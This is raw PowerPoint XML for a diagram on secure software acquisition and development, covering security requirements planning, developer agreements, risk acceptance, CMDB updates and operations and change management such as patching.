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 id="5" name="ezudilin" initials="e" lastIdx="1" clrIdx="4">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="ezudil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5" autoAdjust="0"/>
    <p:restoredTop sz="95096" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="72" d="100"/>
          <a:sy n="72" d="100"/>
        </p:scale>
        <p:origin x="2082" y="0"/>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128"/>
        <p:guide pos="2142"/>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sz="1050" b="1">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ru-RU"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ru-RU" sz="950" noProof="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Identify </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="950" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>the </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="950" noProof="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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>of your </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="950" noProof="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ru-RU" sz="950" noProof="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ru-RU" sz="95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ru-RU" sz="95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Define a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ru-RU" sz="95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Establish an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ru-RU" sz="95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ru-RU" sz="950">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="ru-RU" sz="95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ru-RU" sz="950">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> and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ru-RU" sz="95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ru-RU" sz="95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ru-RU" sz="95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ru-RU" sz="95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ru-RU" sz="95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ru-RU" sz="950">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:b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Conduct a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ru-RU" sz="950">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> to define key</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="ru-RU" sz="950">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="ru-RU" sz="95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ru-RU" sz="95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Establish a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ru-RU" sz="95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Establish an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ru-RU" sz="95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t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>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t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr 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t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>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t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{6A3585BA-CA15-D445-B363-69657B2B32CF}" type="presOf" srcId="{085D3A5B-E8C3-4ABB-9F97-7914BC595087}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{0D8776E4-C6E0-DD41-8284-A92422A38905}"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62AFFE9-B6FE-7E4C-82C5-DA2F105924FE}" type="presOf" srcId="{FE1D3C8A-BAB1-4DF8-A33A-DAA9700726E1}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{FD9C069B-4BC5-AF4E-B9A3-9EE6325C1020}" type="presOf" srcId="{F07B8E8B-96F5-4983-82B3-83A75552F3EA}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="3"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22FA58E-2B10-AA45-AAA6-D868389BD866}" type="presOf" srcId="{024BBBE2-0706-4354-8AB0-3262009E8862}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D75BDABB-0E4D-8D48-A5FC-9B1905DA98C5}" type="presOf" srcId="{84E62741-DE92-5D48-8E11-F5450775D2EB}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="1"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1D33E389-58B7-1142-A6BD-8178E5656980}" type="presOf" srcId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}"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B886C4BA-2115-5941-977B-68503F3F259A}" type="presOf" srcId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{5B471791-B1D8-6F41-BFB9-9F219E74198D}" type="presOf" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}"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F4310F8C-11E5-BA4B-B000-F69F3EE7507D}" type="presOf" srcId="{146439ED-B762-48F0-BE3C-0D5D54E004EE}"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EA88B819-0C50-2040-9AE6-390D3F7E426F}" type="presOf" srcId="{F576BD5F-AD4E-429F-935A-1A67C630AE0F}" destId="{29555282-7DBF-4954-82C2-561252AD070F}"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ru-RU" sz="900">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="ru-RU" sz="9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ru-RU" sz="900" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>with</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="9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ru-RU" sz="9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ru-RU" sz="900">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>, integrity and availability of all data assets, and the expected business logic.</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Planning and </a:t>
          </a:r>
          <a:br>
            <a:rPr lang="ru-RU" sz="1050" b="1" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>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ru-RU" sz="9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sz="9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sz="9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ru-RU" sz="900" noProof="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ru-RU" sz="9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ru-R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ts val="1000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="ru-RU" sz="9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ru-RU" sz="900" noProof="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ru-RU" sz="900" noProof="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ru-RU" sz="900" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>.</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="ru-RU" sz="900" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="ru-RU" sz="900" b="1" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Note: </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="900" b="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>The annex is for US contract law, so please consult qualified legal advice before using the sample annex</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="900" noProof="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ru-RU" sz="9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appropriate to the protection needs and the expected threat level. This should be supported by security specialists.</a:t>
          </a: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ts val="1000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="ru-RU" sz="9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accepts remaining risks or provides additional resources.</a:t>
          </a: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ts val="1000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="ru-RU" sz="9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that include constraints added for non-functional requirements.</a:t>
          </a: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assumed threat level by the application.</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en-US"/>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en-US"/>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en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" type="pres">
      <dgm:prSet presAssocID="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="4" presStyleCnt="6" custScaleX="123722" custScaleY="107152">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>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en-US"/>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en-US"/>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2AE97330-074B-4EBD-B20E-409131B4C40C}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{B9654840-CCA9-475F-8026-A0CB36AC23A9}" srcOrd="3" destOrd="0" parTransId="{3E0B7461-5330-4740-AF6F-42E7B3BEFEFB}" sibTransId="{1D675F40-F864-4B2E-B6E2-C9D29AFA9020}"/>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ru-RU" sz="950" kern="1200" noProof="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Establish an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Conduct a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to define key</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="ru-RU" sz="950" kern="1200">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="ru-RU" sz="950" kern="120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Identify </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="950" kern="1200" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>the </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="950" kern="1200" noProof="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t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="950" kern="1200" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>of your </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="950" kern="1200" noProof="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ru-RU" sz="950" kern="1200" noProof="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Establish a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Define a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Establish an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ru-RU" sz="950" kern="1200">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="ru-RU" sz="950" kern="120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and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ru-RU" sz="950" kern="1200">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="ru-RU"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59351" y="-2227576"/>
          <a:ext cx="85527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ru-RU" sz="900" kern="1200">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="ru-RU" sz="900" kern="120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with</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="900" kern="120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authenticity</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="900" kern="1200">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>, integrity and availability of all data assets, and the expected business logic.</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nonfunctional security requirements.</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sp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1313588" y="101689"/>
        <a:ext cx="5346805" cy="771777"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="1761"/>
          <a:ext cx="1115983"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3285" y="49192"/>
        <a:ext cx="1021121" cy="876770"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{29555282-7DBF-4954-82C2-561252AD070F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3469548" y="-1103740"/>
          <a:ext cx="103488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the requirements with internal or external developers, including guidelines and security requirements with respect to your security program, e.g. SDLC, best practices.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="400050" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pP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p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="400050" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pP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p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="400050" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="ru-RU" sz="900" kern="1200" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Adopt templates and checklists, such as </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="900" kern="1200" noProof="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ru-RU" sz="900" kern="1200" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>.</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="ru-RU" sz="900" kern="1200" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="ru-RU" sz="900" b="1" kern="1200" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Note: </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="900" b="0" kern="1200">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>The annex is for US contract law, so please consult qualified legal advice before using the sample annex</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="900" kern="1200" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1322357" y="1144489"/>
        <a:ext cx="5329269" cy="933849"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{32E4C202-A073-4E81-BC9F-5F3538C94998}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="1032193"/>
          <a:ext cx="1115983"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0332" y="1086671"/>
        <a:ext cx="1007027" cy="1049483"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F55C0F19-ACD0-452E-8743-4A25E747654D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3507052" y="114105"/>
          <a:ext cx="959877"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p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="400050" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pP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appropriate to the protection needs and the expected threat level. This should be supported by security specialists.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="400050" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pP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accepts remaining risks or provides additional resources.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="400050" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="ru-RU" sz="900" kern="1200" noProof="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that include constraints added for non-functional requirements.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1318694" y="2396177"/>
        <a:ext cx="5336593" cy="866163"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="2249433"/>
          <a:ext cx="1115983"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Planning and </a:t>
          </a:r>
          <a:b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b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303911"/>
        <a:ext cx="1007027" cy="1050694"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{992D08B6-B207-435B-A893-D17B49418ACB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3301853" y="1466642"/>
          <a:ext cx="1362792"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all required components, including needed authorizations.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="400050">
            <a:lnSpc>
              <a:spcPct val="90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assumed threat level by the application.</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change management data base (CMDB) and security architecture.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1337273" y="3564274"/>
        <a:ext cx="5291952" cy="1229740"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5CD1B5CA-4D0D-4D4E-B88E-2005B67086FE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="3467883"/>
          <a:ext cx="1114893"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p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="210279" y="3522308"/>
        <a:ext cx="1006043" cy="1313671"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0BBDD660-3A49-4256-9C52-69675972DDC1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3479208" y="2832099"/>
          <a:ext cx="1008083"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Operations must include guidelines for the security management of the application (e.g. patch management).</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the CMDB and the security architecture, controls, and countermeasures, including any runbooks or project documentation.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1319959" y="5089770"/>
        <a:ext cx="5326582" cy="909661"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D01C5B61-0A7B-4E05-A4E4-BE9BD871660D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="4949205"/>
          <a:ext cx="1114893"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Operations and Change Management</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="210279" y="5003630"/>
        <a:ext cx="1006043" cy="1081941"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3694906" y="3848749"/>
          <a:ext cx="58416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p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1300354" y="6300335"/>
        <a:ext cx="5373273" cy="527135"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{50CC931A-2802-4A28-B17D-4CFEC4144601}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="6198796"/>
          <a:ext cx="1115983"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1500" y="6234442"/>
        <a:ext cx="1044691"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45955" cy="495675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="105099" tIns="52549" rIns="105099" bIns="52549" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="de-DE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Datumsplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3850246" y="2"/>
            <a:ext cx="2945955" cy="495675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="105099" tIns="52549" rIns="105099" bIns="52549" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{46C0059F-706E-42AF-B504-DA4BA04161AF}" type="datetimeFigureOut">
              <a:rPr lang="de-DE" smtClean="0"/>
              <a:t>19.12.2017</a:t>
            </a:fld>
            <a:endParaRPr lang="de-DE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Fußzeilenplatzhalter 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="9429324"/>
            <a:ext cx="2945955" cy="495675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="105099" tIns="52549" rIns="105099" bIns="52549" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="de-DE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Foliennummernplatzhalter 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3850246" y="9429324"/>
            <a:ext cx="2945955" cy="495675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
